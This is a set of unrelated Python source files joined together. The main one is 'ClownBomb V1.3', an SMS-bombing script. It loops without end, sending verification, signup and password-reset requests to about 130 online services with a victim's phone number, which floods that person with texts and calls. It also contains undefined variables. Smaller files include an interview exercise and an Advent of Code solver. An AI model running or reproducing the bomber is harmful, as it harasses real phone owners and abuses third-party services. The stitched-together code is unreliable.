    VAR_PARAMETER = 8
    VARIABLE = 9
    UNDEFINED = 10
class IdClass:
    """Identifier-class descriptor, usable as a dictionary key."""

    def __init__(self, cl = None):
        """Store *cl* as the identifier-class name (_name)."""
        self._name = cl

    def setName(self, cl):
        """Set the identifier-class name."""
        self._name = cl

    def getName(self):
        """Return the identifier-class name."""
        return self._name

    def __eq__(self, other):
        """Equality on the class name (required alongside __hash__ for dict keys).

        The original body compared against an undefined name `cl` while the
        parameter was called `nt`, raising NameError on every comparison.
        """
        if not isinstance(other, IdClass):
            return NotImplemented
        return self._name == other.getName()

    def __hash__(self):
        """Hash by name so equal IdClass objects collide as dictionary keys."""
        return hash(self._name)
| true |
6adff17d73394254aec911b4b0ffb4b510ed1af8 | Python | chettayyuvanika/Questions | /Easy/Second_Smallest.py | UTF-8 | 1,338 | 3.703125 | 4 | [] | no_license | # Problem Name is &&& Second Smallest &&& PLEASE DO NOT REMOVE THIS LINE.
"""
Instructions to candidate.
1) Run this code in the REPL to observe its behaviour. The execution entry point is main().
2) Consider adding some additional tests in doTestsPass().
3) Implement secondSmallest() correctly.
4) If time permits, some possible follow-ups.
"""
def secondSmallest(x):
    """ Returns second smallest element in the array x. Returns nothing if array has less than 2 elements. """
    if len(x) < 2:
        return None
    # With at least two elements, the second smallest (duplicates counted)
    # is simply index 1 of a sorted copy.
    return sorted(x)[1]
def doTestsPass():
    """ Returns True if every built-in test case passes, otherwise False. """
    cases = [([0], None), ([0, 1], 1), ([1, 1, 7, 6, 3, 5, 8], 1)]
    return all(secondSmallest(arr) == expected for arr, expected in cases)
if __name__ == "__main__":
    # Self-check: run the built-in test table and report the outcome.
    if( doTestsPass() ):
        print( "All tests pass" )
    else:
        print( "Not all tests pass" )
38c5f2ca401a10f24c94fd39f410134783413448 | Python | clownGUI/ClownBombV1.3 | /V1.3.py | UTF-8 | 30,067 | 2.515625 | 3 | [] | no_license | #!/usr/bin/python3
# Spammer
# Author: milkpro
import random, time, os
from time import sleep
try: import requests
except: os.system("pip install requests")
print ( "connections..." )
sleep ( 4 )
def main():
os.system('cls' if os.name=='nt' else 'clear')
logo = """\033[32m\n\033[32m
▒█▀▀█ █░░ █▀▀█ █░░░█ █▀▀▄ █▀▀▄ █▀▀█ █▀▄▀█ █▀▀▄
▒█░░░ █░░ █░░█ █▄█▄█ █░░█ █▀▀▄ █░░█ █░▀░█ █▀▀▄
▒█▄▄█ ▀▀▀ ▀▀▀▀ ░▀░▀░ ▀░░▀ ▀▀▀░ ▀▀▀▀ ▀░░░▀ ▀▀▀░
▒█░░▒█ ▄█░ ░ █▀▀█
░▒█▒█░ ░█░ ▄ ░░▀▄
░░▀▄▀░ ▄█▄ █ █▄▄█ By ClownDetecter\n\033[0m"""
_phone = input(logo+"\033[34m number>> \033[0m")
if len(_phone) == 11 or len(_phone) == 12 or len(_phone) == 13:
pass
else:
print("\n\033[31m[!] Неправильный номер.\033[0m")
time.sleep(2)
main()
if _phone[0] == "+":
_phone = _phone[1:]
if _phone[0] == "8":
_phone = "7"+_phone[1:]
if _phone[0] == "9":
_phone = "7"+_phone
if _phone == "79151825692":
print("\n\033[31m ^\nSyntaxError: invalid syntax\033[0m")
time.sleep(2)
main()
_name = ""
russian_name = ""
for x in range(12):
_name = _name + random.choice(list("123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"))
password = _name + random.choice(list("123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"))
username = _name + random.choice(list("123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"))
russian_name = russian_name + random.choice(list("АаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфХхЦцЧчШшЩщЪъЫыЬьЭэЮюЯя"))
_phone9 = _phone[1:]
_phoneAresBank = "+"+ _phone[0]+"("+ _phone[1:4]+")"+ _phone[4:7]+"-"+ _phone[7:9]+"-"+ _phone[9:11]
_phone9dostavista = _phone9[:3]+"+"+ _phone9[3:6]+"-"+ _phone9[6:8]+"-"+ _phone9[8:10]
_phoneOstin = "+"+ _phone[0]+"+("+ _phone[1:4]+")"+ _phone[4:7]+"-"+ _phone[7:9]+"-"+ _phone[9:11]
_phonePizzahut = "+" + _phone[0]+" ("+ _phone[1:4]+") "+ _phone[4:7]+" "+ _phone[7:9]+" "+ _phone[9:11]
_phoneGorzdrav = _phone[1:4]+") "+ _phone[4:7]+"-"+ _phone[7:9]+"-"+ _phone[9:11]
iteration = 0
_email = _name+f"{iteration}"+"@gmail.com"
email = _email
os.system('cls' if os.name=='nt' else 'clear')
print(logo+"\033[37mТелефон: \033[34m"+_phone+"\n\033[37mСпамер запущен.\033[0m\n")
while True:
try:
try:
requests.post("https://moscow.rutaxi.ru/ajax_keycode.html", data={"l": _phone9}).json()["res"]
except:
pass
try:
requests.post("https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru", data={"phone_number": _phone}, headers={})
except:
pass
try:
requests.post("https://app.karusel.ru/api/v1/phone/", data={"phone": _phone}, headers={})
except:
pass
try:
requests.post("https://api.mtstv.ru/v1/users", json={"msisdn": _phone}, headers={})
except:
pass
try:
requests.post("https://youla.ru/web-api/auth/request_code", data={"phone": _phone})
except:
pass
try:
requests.post("https://www.citilink.ru/registration/confirm/phone/+" + _phone + "/")
except:
pass
try:
requests.get("https://findclone.ru/register", params={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": _phone})
except:
pass
try:
requests.post("https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={"msisdn": _phone, "locale": "en", "countryCode": "ru", "version": "1", "k": "ic1rtwz1s1Hj1O0r", "r": "46763"})
except:
pass
try:
requests.post("https://guru.taxi/api/v1/driver/session/verify", json={"phone": {"code": 1, "number": _phone}})
except:
pass
try:
requests.post("https://cloud.mail.ru/api/v2/notify/applink", json={"phone": "+" + _phone, "api": 2, "email": "email", "x-email": "x-email"})
except:
pass
try:
requests.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data={"st.r.phone": "+" +_phone})
except:
pass
try:
requests.post("https://passport.twitch.tv/register?trusted_request=true", json={"birthday": {"day": 11, "month": 11, "year": 1999}, "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True, "password": password, "phone_number": _phone, "username": username})
except:
pass
try:
requests.post("https://www.instagram.com/accounts/account_recovery_send_ajax/", data={"email_or_username": _phone, "recaptcha_challenge_field":""})
except:
pass
try:
requests.post("https://vladikavkaz.edostav.ru/site/CheckAuthLogin", data={"phone_or_email":_phone}, headers={"Host": "vladikavkaz.edostav.ru", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US, en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "26"})
except:
pass
try:
requests.post("https://fix-price.ru/ajax/register_phone_code.php", data={"register_call": "Y", "action": "getCode", "phone": "+" + _phone})
except:
pass
try:
requests.post("https://ube.pmsm.org.ru/esb/iqos-phone/validate", json={"phone": _phone})
except:
pass
try:
requests.post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data={"phone": _phone})
except:
pass
try:
requests.post("https://account.my.games/signup_send_sms/", data={"phone": _phone})
except:
pass
try:
requests.post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry", json={"phone": _phone, "otpId": 0})
except:
pass
try:
requests.post("https://smart.space/api/users/request_confirmation_code/", json={"mobile": "+" +_phone, "action": "confirm_mobile"})
except:
pass
try:
requests.post("https://dostavista.ru/backend/send-verification-sms", data={"phone": _phone9dostavista})
except:
pass
try:
requests.post("https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": "+" + _phone})
except:
pass
try:
requests.post("https://shop.vsk.ru/ajax/auth/postSms/", data={"phone": _phone})
except:
pass
try:
requests.post("https://msk.tele2.ru/api/validation/number/" +_phone, json={"sender": "Tele2"})
except:
pass
try:
requests.post("https://p.grabtaxi.com/api/passenger/v2/profiles/register", data={"phoneNumber": _phone, "countryCode": "ID", "name": "test", "email": "mail@mail.com", "deviceToken": "*"}, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"})
except:
pass
try:
requests.post("https://belkacar.ru/get-confirmation-code", data={"phone": _phone}, headers={})
except:
pass
try:
requests.post("https://www.rabota.ru/remind", data={"credential": _phone})
except:
pass
try:
requests.post("https://rutube.ru/api/accounts/sendpass/phone", data={"phone": "+"+_phone})
except:
pass
try:
requests.post("https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php", data={"name": _name, "phone": _phone, "promo": "yellowforma"})
except:
pass
try:
requests.get("https://www.oyorooms.com/api/pwa/generateotp?phone="+_phone9+"&country_code=%2B7&nod=4&locale=en")
except:
pass
try:
requests.post("https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode", params={"pageName": "registerPrivateUserPhoneVerificatio"}, data={"phone": _phone, "recaptcha": "off", "g-recaptcha-response": ""})
except:
pass
try:
requests.post("https://newnext.ru/graphql", json={"operationName": "registration", "variables": {"client": {"firstName": "Иван", "lastName": "Иванов", "phone": _phone, "typeKeys": ["Unemployed"]}}, "query": "mutation registration($client: ClientInput!) {""\n registration(client: $client) {""\n token\n __typename\n }\n}\n"})
except:
pass
try:
requests.post("https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/", json={"client_type": "personal", "email": _email, "mobile_phone": _phone, "deliveryOption": "sms"})
except:
pass
try:
requests.post("https://lk.invitro.ru/sp/mobileApi/createUserByPassword", data={"password": password, "application": "lkp", "login": "+" + _phone})
except:
pass
try:
requests.post("https://online.sbis.ru/reg/service/", json={"jsonrpc":"2.0", "protocol":"5", "method":"Пользователь.ЗаявкаНаФизика", "params":{"phone":_phone}, "id":"1"})
except:
pass
try:
requests.post("https://ib.psbank.ru/api/authentication/extendedClientAuthRequest", json={"firstName":"Иван", "middleName":"Иванович", "lastName":"Иванов", "sex":"1", "birthDate":"10.10.2000", "mobilePhone": _phone9, "russianFederationResident":"true", "isDSA":"false", "personalDataProcessingAgreement":"true", "bKIRequestAgreement":"null", "promotionAgreement":"true"})
except:
pass
try:
requests.post("https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru", data={"phone": _phone})
except:
pass
try:
requests.post("https://api.carsmile.com/", json={"operationName": "enterPhone", "variables": {"phone": _phone}, "query": "mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n"})
except:
pass
try:
requests.post("https://terra-1.indriverapp.com/api/authorization?locale=ru", data={"mode": "request", "phone": "+" + _phone, "phone_permission": "unknown", "stream_id": 0, "v": 3, "appversion": "3.20.6", "osversion": "unknown", "devicemodel": "unknown"})
except:
pass
try:
requests.post("http://smsgorod.ru/sendsms.php", data={"number": _phone})
except:
pass
try:
requests.post("https://www.stoloto.ru/send-mobile-app-link", data={"phone": _phone})
except:
pass
try:
requests.post("https://cabinet.wi-fi.ru/api/auth/by-sms", data={"msisdn": _phone}, headers={"App-ID": "cabinet"})
except:
pass
try:
requests.post("https://api.wowworks.ru/v2/site/send-code", json={"phone": _phone, "type": 2})
except:
pass
try:
requests.post("https://api-prime.anytime.global/api/v2/auth/sendVerificationCode", data={"phone": _phone})
except:
pass
try:
requests.post("https://www.delivery-club.ru/ajax/user_otp", data={"phone": _phone})
except:
pass
try:
requests.post("https://alfalife.cc/auth.php", data={"phone": _phone})
except:
pass
try:
requests.post("https://app.benzuber.ru/login", data={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://app.cloudloyalty.ru/demo/send-code", json={"country": 2, "phone": _phone, "roistatVisit": "47637", "experiments": {"new_header_title": "1"}})
except:
pass
try:
requests.post("https://api.delitime.ru/api/v2/signup", data={"SignupForm[username]": _phone, "SignupForm[device_type]": 3})
except:
pass
try:
requests.post("https://www.finam.ru/api/smslocker/sendcode", data={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://lenta.com/api/v1/authentication/requestValidationCode", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://www.ollis.ru/gql", json={"query": "mutation { phone(number:'%s', locale:ru) { token error { code message } } }"% _phone})
except:
pass
try:
requests.post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code", json={"phone": _phone})
except:
pass
try:
requests.post("https://app.redmondeda.ru/api/v1/app/sendverificationcode", headers={"token": "."}, data={"phone": _phone})
except:
pass
try:
requests.post("https://app.sberfood.ru/api/mobile/v3/auth/sendSms", json={"userPhone": "+" + _phone}, headers={"AppKey": "WebApp-3a2605b0cf2a4c9d938752a84b7e97b6"})
except:
pass
try:
requests.post("https://shopandshow.ru/sms/password-request/", data={"phone": "+" +_phone, "resend": 0})
except:
pass
try:
requests.get("https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper", params={"oper": 9, "callmode": 1, "phone": "+" +_phone})
except:
pass
try:
requests.get("https://www.sportmaster.ru/", params={"module": "users", "action": "SendSMSReg", "phone": _phone})
except:
pass
try:
requests.post("https://api.tinkoff.ru/v1/sign_up", data={"phone": "+" +_phone})
except:
pass
try:
requests.post('https://api.fex.net/api/v1/auth/scaffold', data={"phone": _phone})
except:
pass
try:
requests.post('https://api.ennergiia.com/auth/api/development/lor', data={"phone": _phone})
except:
pass
try:
requests.post("https://api.chef.yandex/api/v2/auth/sms", json={"phone": _phone})
except:
pass
try:
requests.post("https://pizzahut.ru/account/password-reset", data={"reset_by":"phone", "action_id":"pass-recovery", "phone": _phonePizzahut, "_token":"*"})
except:
pass
try:
requests.post("https://plink.tech/resend_activation_token/?via=call", json={"phone": _phone})
except:
pass
try:
requests.post("https://plink.tech/register/", json={"phone": _phone})
except:
pass
try:
requests.post("https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode", data={"telephone": "8" + _phone9})
except:
pass
try:
requests.post('https://gorzdrav.org/login/register/sms/send', data={"phone": _phoneGorzdrav})
except:
pass
try:
requests.post("https://apteka366.ru/login/register/sms/send", data={"phone": _phoneGorzdrav})
except:
pass
try:
requests.post("https://client-api.sushi-master.ru/api/v1/auth/init", json={"phone": _phone})
except:
pass
try:
requests.get("https://suandshi.ru/mobile_api/register_mobile_user", params={"phone": _phone})
except:
pass
try:
requests.post("https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php", data={"demo_number": "+" + _phone, "ajax_demo_send": "1"})
except:
pass
try:
requests.post("https://app.salampay.com/api/system/sms/c549d0c2-ee78-4a98-659d-08d682a42b29", data={"caller_number": _phone})
except:
pass
try:
requests.post("https://mousam.ru/api/checkphone", data={"phone": _phone, "target": "android app v0.0.2"})
except:
pass
try:
requests.post("https://ggbet.ru/api/auth/register-with-phone", data={"phone": "+" + _phone, "login": email, "password": password, "agreement": "on", "oferta": "on"})
except:
pass
try:
requests.post("https://ng-api.webbankir.com/user/v2/create", json={"lastName": name, "firstName": name, "middleName": name, "mobilePhone": _phone, "email": email,"smsCode": ""})
except:
pass
try:
requests.post("https://api.iconjob.co/api/auth/verification_code", json={"phone": _phone})
except:
pass
try:
requests.post("https://3040.com.ua/taxi-ordering", data={"callback-phone": _phone})
except:
pass
try:
requests.post("https://city24.ua/personalaccount/account/registration", data={"PhoneNumber": _phone})
except:
pass
try:
requests.post("https://api.easypay.ua/api/auth/register", json={"phone": _phone, "password": _name})
except:
pass
try:
requests.post("https://api.kinoland.com.ua/api/v1/service/send-sms", headers={"Agent": "website"}, json={"Phone": _phone, "Type": 1})
except:
pass
try:
requests.post("https://www.menu.ua/kiev/delivery/profile/show-verify.html", data={"phone": _phone, "do": "phone"})
except:
pass
try:
requests.post("https://www.menu.ua/kiev/delivery/registration/direct-registration.html", data={"user_info[fullname]": name, "user_info[phone]": _phone, "user_info[email]": email, "user_info[password]": name, "user_info[conf_password]": name})
except:
pass
try:
requests.post("https://mobileplanet.ua/register", data={"klient_name": name, "klient_phone": "+" + _phone, "klient_email": email})
except:
pass
try:
requests.post("https://www.monobank.com.ua/api/mobapplink/send", data={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://www.moyo.ua/identity/registration", data={"firstname": name, "phone": _phone, "email": email})
except:
pass
try:
requests.post("https://auth.multiplex.ua/login", json={"login": _phone})
except:
pass
try:
requests.post("https://www.nl.ua", data={"component": "bxmaker.authuserphone.login", "sessid": "bf70db951f54b837748f69b75a61deb4", "method": "sendCode", "phone": _phone, "registration": "N"})
except:
pass
try:
requests.get("https://secure.online.ua/ajax/check_phone/", params={"reg_phone": _phone})
except:
pass
try:
requests.get("https://cabinet.planetakino.ua/service/sms", params={"phone": _phone})
except:
pass
try:
requests.get("https://www.sportmaster.ua/", params={"module": "users", "action": "SendSMSReg", "phone": _phone})
except:
pass
try:
requests.post("https://www.uklon.com.ua/api/v1/account/code/send", headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": _phone})
except:
pass
try:
requests.post("https://www.yaposhka.kh.ua/customer/account/createpost/", data={"success_url": "", "error_url": "", "is_subscribed": "0", "firstname": name, "lastname": name, "email": email, "password":name, "password_confirmation": name, "telephone": _phone})
except:
pass
try:
requests.post("https://helsi.me/api/healthy/accounts/login", json={"phone": _phone, "platform": "PISWeb"})
except:
pass
try:
requests.post("https://bamper.by/registration/?step=1", data={"phone": "+" + _phone, "submit": "Запросить смс подтверждения", "rules": "on"})
except:
pass
try:
requests.get("https://it.buzzolls.ru:9995/api/v2/auth/register", params={"phoneNumber": "+" + _phone}, headers={"keywordapi": "ProjectVApiKeyword", "usedapiversion": "3"})
except:
pass
try:
requests.post("https://api.cian.ru/sms/v1/send-validation-code/", json={"phone": "+" + _phone, "type": "authenticateCode"})
except:
pass
try:
requests.post("https://clients.cleversite.ru/callback/run.php", data={"siteid": "62731", "num": _phone, "title": "Онлайн-консультант", "referrer": "https://m.cleversite.ru/call"})
except:
pass
try:
requests.post("https://my.dianet.com.ua/send_sms/", data={"phone": _phone})
except:
pass
try:
requests.post("https://vladimir.edostav.ru/site/CheckAuthLogin", data={"phone_or_email": "+" + _phone})
except:
pass
try:
requests.get("https://api.eldorado.ua/v1/sign/", params={"login": _phone, "step": "phone-check", "fb_id": "null", "fb_token": "null", "lang": "ru"})
except:
pass
try:
requests.post("https://www.etm.ru/cat/runprog.html", data={"m_phone": _phone, "mode": "sendSms", "syf_prog": "clients-services", "getSysParam": "yes"})
except:
pass
try:
requests.post("https://www.flipkart.com/api/5/user/otp/generate", headers={"Origin": "https://www.flipkart.com", "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"}, data={"loginId": "+" + _phone})
except:
pass
try:
requests.post("https://www.flipkart.com/api/6/user/signup/status", headers={"Origin": "https://www.flipkart.com", "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"}, json={"loginId": "+" + _phone, "supportAllStates": True})
except:
pass
try:
requests.get("https://foodband.ru/api/", params={"call": "customers/sendVerificationCode", "phone": _phone, "g-recaptcha-response": ""})
except:
pass
try:
requests.post("https://friendsclub.ru/assets/components/pl/connector.php", data={"casePar": "authSendsms", "MobilePhone": "+" + _phone})
except:
pass
try:
requests.post("https://crm.getmancar.com.ua/api/veryfyaccount", json={"phone": "+" + _phone, "grant_type": "password", "client_id": "gcarAppMob", "client_secret": "SomeRandomCharsAndNumbersMobile"})
except:
pass
try:
requests.post("https://www.hatimaki.ru/register/", data={"REGISTER[LOGIN]": _phone, "REGISTER[PERSONAL_PHONE]": _phone, "REGISTER[SMS_CODE]": "", "resend-sms": "1", "REGISTER[EMAIL]": "", "register_submit_button": "Зарегистрироваться"})
except:
pass
try:
requests.post("https://helsi.me/api/healthy/accounts/login", json={"phone": _phone, "platform": "PISWeb"})
except:
pass
try:
requests.get("https://api.hmara.tv/stable/entrance", params={"contact": _phone})
except:
pass
try:
requests.post("https://api.imgur.com/account/v1/phones/verify", json={"phone_number": _phone, "region_code": "RU"})
except:
pass
try:
requests.post("https://informatics.yandex/api/v1/registration/confirmation/phone/send/", data={"country": "RU", "csrfmiddlewaretoken": "", "phone": _phone})
except:
pass
try:
requests.post("https://izi.ua/api/auth/register", json={"phone": "+" + _phone, "name": name, "is_terms_accepted": True})
except:
pass
try:
requests.post("https://izi.ua/api/auth/sms-login", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://kaspi.kz/util/send-app-link", data={"address": _phone})
except:
pass
try:
requests.post("https://koronapay.com/transfers/online/api/users/otps", data={"phone": _phone})
except:
pass
try:
requests.post("https://rubeacon.com/api/app/5ea871260046315837c8b6f3/middle", json={"url": "/api/client/phone_verification", "method": "POST", "data": {"client_id": 5646981, "phone": _phone, "alisa_id": 1}, "headers": {"Client-Id": 5646981, "Content-Type": "application/x-www-form-urlencoded"}})
except:
pass
try:
requests.post("https://loany.com.ua/funct/ajax/registration/code", data={"phone": _phone})
except:
pass
try:
requests.post("https://api-rest.logistictech.ru/api/v1.1/clients/request-code", json={"phone": _phone}, headers={"Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9"})
except:
pass
try:
requests.post("https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php", data={"data": _phone, "metod": "postreg"})
except:
pass
try:
requests.get("https://menza-cafe.ru/system/call_me.php", params={"fio": name, "phone": _phone, "phone_number": "1"})
except:
pass
try:
requests.get("https://my.mistercash.ua/ru/send/sms/registration", params={"number": "+" + _phone,})
except:
pass
try:
requests.post("https://www.niyama.ru/ajax/sendSMS.php", data={"REGISTER[PERSONAL_PHONE]": _phone, "code": "", "sendsms": "Выслать код"})
except:
pass
try:
requests.post("https://piroginomerodin.ru/index.php?route=sms/login/sendreg", data={"telephone": "+" + _phone})
except:
pass
try:
requests.post("https://api.saurisushi.ru/Sauri/api/v2/auth/login", data={"data": json.dumps({"login": _phone})})
except:
pass
try:
requests.post("https://sayoris.ru/?route=parse/whats", data={"phone": _phone})
except:
pass
try:
requests.post("https://shafa.ua/api/v3/graphiql", json={"operationName": "RegistrationSendSms", "variables": {"phoneNumber": "+" + _phone}, "query": "mutation RegistrationSendSms($phoneNumber: String!) {\n unauthorizedSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n field\n messages {\n message\n code\n __typename\n }\n __typename\n }\n __typename\n }\n}\n"})
except:
pass
try:
requests.post("https://shafa.ua/api/v3/graphiql", json={"operationName": "sendResetPasswordSms", "variables": {"phoneNumber": "+" + _phone}, "query": "mutation sendResetPasswordSms($phoneNumber: String!) {\n resetPasswordSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n ...errorsData\n __typename\n }\n __typename\n }\n}\n\nfragment errorsData on GraphResponseError {\n field\n messages {\n code\n message\n __typename\n }\n __typename\n}\n"})
except:
pass
try:
requests.get("https://auth.pizza33.ua/ua/join/check/", params={"callback": "angular.callbacks._1", "email": email, "password": password, "phone": _phone, "utm_current_visit_started": 0, "utm_first_visit": 0, "utm_previous_visit": 0, "utm_times_visited": 0})
except:
pass
try:
requests.post("https://sushifuji.ru/sms_send_ajax.php", data={"name": "false", "phone": _phone})
except:
pass
try:
requests.post("https://tabasko.su/", data={"IS_AJAX": "Y", "COMPONENT_NAME": "AUTH", "ACTION": "GET_CODE", "LOGIN": _phone})
except:
pass
try:
requests.post("https://www.tarantino-family.com/wp-admin/admin-ajax.php", data={"action": "callback_phonenumber", "phone": _phone})
except:
pass
try:
requests.post("https://taxi-ritm.ru/ajax/ppp/ppp_back_call.php?URL=/", data={"RECALL": "Y", "BACK_CALL_PHONE": _phone})
except:
pass
try:
requests.post("https://thehive.pro/auth/signup", json={"phone": "+" + _phone})
except:
pass
try:
requests.post("https://uklon.com.ua/api/v1/account/code/send", headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": _phone})
except:
pass
try:
requests.post("https://partner.uklon.com.ua/api/v1/registration/sendcode", headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": _phone})
except:
pass
try:
requests.post("https://app.doma.uchi.ru/api/v1/parent/signup_start", json={"phone": "+" + _phone, "first_name": "-", "utm_data": {}, "via": "call"})
except:
pass
try:
requests.post("https://app.doma.uchi.ru/api/v1/parent/signup_start", json={"phone": "+" + _phone, "first_name": "-", "utm_data": {}, "via": "sms"})
except:
pass
try:
requests.post("https://b.utair.ru/api/v1/login/", data={"login": "+" + _phone})
except:
pass
try:
requests.get("https://vezitaxi.com/api/employment/getsmscode", params={"phone": "+" + _phone, "city": 561, "callback": "jsonp_callback_35979"})
except:
pass
try:
requests.post("https://ng-api.webbankir.com/user/v2/create", json={"lastName": russian_name, "firstName": russian_name, "middleName": russian_name, "mobilePhone": formatted_phone, "email": email, "smsCode": ""})
except:
pass
iteration += 1
print(("\033[37m{} круг пройден.\033[0m").format(iteration))
except KeyboardInterrupt:
os.system('cls' if os.name=='nt' else 'clear')
print(logo+"\033[37mТелефон: \033[34m"+_phone+"\n\033[37mСпамер остановлен.\033[0m")
time.sleep(2)
main()
main()
| true |
2389e246bdc3aa3f9954547bac3b8a59f4a5d1f8 | Python | andynormancx/aoc2019 | /day10.py | UTF-8 | 3,013 | 3.28125 | 3 | [] | no_license | #!/usr/local/bin/python3
import InputHelper as IH
import sys
import collections
import math
def solve1(input):
    """Solve AoC 2019 day 10 parts 1 and 2 by printing the results.

    `input` is a sequence of strings where '#' marks an asteroid.
    Prints the best station location with its visible-asteroid count,
    then the order in which the remaining asteroids are destroyed.
    NOTE(review): answers are printed as side effects; the function
    returns None.
    """
    # asteroids maps (col, row) -> number of other asteroids visible from it.
    asteroids = {}
    for row_index, row in enumerate(input):
        rows = len(input)  # unused
        for col_index, col in enumerate(row):
            cols = len(row)  # unused
            if col == '#':
                asteroids[(col_index, row_index)] = 0
    # Two asteroids see each other when no lattice point strictly between
    # them holds another asteroid (O(n^2) pairs, each walked point by point).
    for point, _ in asteroids.items():
        for search_point, _ in asteroids.items():
            if (point != search_point):
                points = points_along_line(point, search_point)
                blocked = False
                for point_on_line in points:
                    if point_on_line in asteroids:
                        blocked = True
                if not blocked:
                    asteroids[point] = asteroids[point] + 1
    # The station is the (first) asteroid achieving the maximum visibility count.
    best_count = max(asteroids.values())
    station_point = list(filter(lambda x:x[1] == best_count, asteroids.items()))[0][0]
    print(f'{station_point} {best_count}')
    remaining_asteroids = set(asteroids.keys())
    remaining_asteroids.remove(station_point)
    # Each sweep destroys every currently-visible asteroid in order of bearing
    # (angle_between: 0 = straight up, increasing clockwise), repeating until
    # nothing is left.
    destroy_count = 0
    while(len(remaining_asteroids) > 0):
        visible = sorted(get_visible(remaining_asteroids, station_point), key=lambda x: angle_between(station_point, x))
        for point in visible:
            destroy_count += 1
            print(f'{destroy_count} {point}')
            remaining_asteroids.remove(point)
remaining_asteroids.remove(point)
def solve2(input):
    """Placeholder for a separate part-2 entry point; always yields 1."""
    placeholder_answer = 1
    return placeholder_answer
def get_visible(asteroids, search_point):
    """Yield every asteroid with an unobstructed line of sight from search_point."""
    for candidate in asteroids:
        if candidate == search_point:
            continue
        between = points_along_line(search_point, candidate)
        if all(step not in asteroids for step in between):
            yield candidate
def points_along_line(start, end):
    """Yield the integer lattice points strictly between start and end.

    There are exactly gcd(dx, dy) - 1 such points; endpoints are excluded.
    """
    dx = end[0] - start[0]
    dy = end[1] - start[1]
    steps = math.gcd(dx, dy)
    step_x, step_y = dx // steps, dy // steps
    for k in range(1, steps):
        yield (start[0] + k * step_x, start[1] + k * step_y)
# Load the day-10 puzzle grid via the project's input helper.
data = IH.InputHelper(10).readlines()
# Bearing convention implemented by angle_between (screen coordinates):
#(0, -1) = 0
#(1, 0) = 90
#(0, 1) = 180
#(-1, 0) = 270
def angle_between(p1, p2):
    """Bearing from p1 to p2 in degrees: 0 = straight up, growing clockwise."""
    delta_y = p2[1] - p1[1]
    delta_x = p2[0] - p1[0]
    wrapped = math.atan2(delta_y, delta_x) % (2 * math.pi)
    return (math.degrees(wrapped) + 90) % 360
def angle_between2(p1, p2):
    """Unused alternative formula: offset difference of the two points' own bearings."""
    first = math.atan2(p1[0], p1[1])
    second = math.atan2(p2[0], p2[1])
    wrapped = (first - second) % (2 * math.pi)
    return (math.degrees(wrapped) + 180) % 360
# Ad-hoc sanity checks for the bearing function, kept disabled:
#print(angle_between((0,0), (0, -1)))
#print(angle_between((0,0), (1, 0)))
#print(angle_between((0,0), (0, 1)))
#print(angle_between((0,0), (-1, 0)))
#print(angle_between((11, 13), (11, 12)))
#print(angle_between((11, 13), (12, 13)))
#print(angle_between((11, 13), (11, 14)))
#print(angle_between((11, 13), (10, 13)))
#quit()
# solve1 prints its answers itself and returns None, so this line also
# shows "Part 1  None" after the per-asteroid output.
print('Part 1 ', solve1(data))
| true |
2914ea571327e319d92f262a95f0666034a4693e | Python | SD-CC-UFG/carlos.henrique.rorato.sd.ufg | /entrega 5/exercicio4.py | UTF-8 | 630 | 2.53125 | 3 | [
"MIT"
] | permissive | # Sistemas Distribuídos
# Aluno: Carlos Henrique Rorato Souza
# Lista 1 implementada com RPC - XML - Exercício 4 Servidor
# O cliente é análogo ao do exercício 1 - basta modificar as entradas.
